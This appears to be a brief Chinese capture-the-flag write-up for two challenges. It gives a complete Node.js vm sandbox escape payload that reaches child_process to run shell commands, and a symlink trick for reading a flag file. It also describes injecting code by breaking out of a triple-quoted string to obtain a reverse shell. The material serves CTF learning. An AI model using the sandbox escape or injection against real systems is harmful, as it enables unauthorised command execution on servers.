escape-web
根据报错知道是vm逃逸,直接搜payload
Object.defineProperty(Promise, Symbol.hasInstance, {value: ()=>false});
async function fn() {
(function stack() {
new Error().stack;
stack();
})();
}
p = fn();
p.constructor = {
[Symbol.species]: class FakePromise {
constructor(executor) {
executor(
(x) => x,
(err) => { return err.constructor.constructor('return process')().mainModule.require('child_process').execSync('ls >&2'); }
)
}
}
};
p.then();但是flag在容器外,不知道怎么逃逸。
看了wp说是ln -s /flag /app/output.txt,可能是把主机的什么文件映射到Docker里,所以可以软链接读取。不懂
intractable problem
非预期
主要是因为拼接code的时候没有过滤''',所以我们就能通过'''来逃出code
我们用两个'''来进行闭合,相当于在code赋值之后多加了我们的payload语句。
成功反弹。